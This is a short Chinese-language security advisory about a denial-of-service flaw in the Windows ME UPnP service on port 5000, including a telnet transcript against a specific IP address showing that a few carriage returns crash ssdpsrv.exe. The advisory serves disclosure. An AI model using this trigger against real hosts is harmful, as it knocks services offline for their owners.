WindowsME UPnP 服务器拒绝服务漏洞

/ns/ld/win/data/20011117231728.htm

涉及程序：
WindowsME UPnP

描述：
WindowsME UPnP 服务器存在拒绝服务漏洞

详细：
发现 WindowsME 上的 UPnP 服务器存在拒绝服务漏洞。该服务器监听于5000端口，c:\windows\system\ssdpsrv.exe 是运行 UPnP 的程序，它在系统启动时会自动运行

KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices

关于 UPnP 相关信息，请参考:

http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP

如果攻击者连接该服务器并发送3到5个回车键将会导致服务器出错并崩溃。

<snip>
bash-2.05$ telnet 165.121.234.217 5000
Trying 165.121.234.217...
Connected to 165.121.234.217.
Escape character is '^]'.




HTTP/1.1 400 Bad Request


Connection closed by foreign host.
bash-2.05$
</snap>


服务器将会有以下错误信息：
Ssdpsrv has caused an error in MSVCRT.DLL.
Ssdpsrv will now close.
If you continue to experience problems,
try restarting your computer.

用户需重启服务器才能恢复正常。

解决方案：
微软尚未作出反应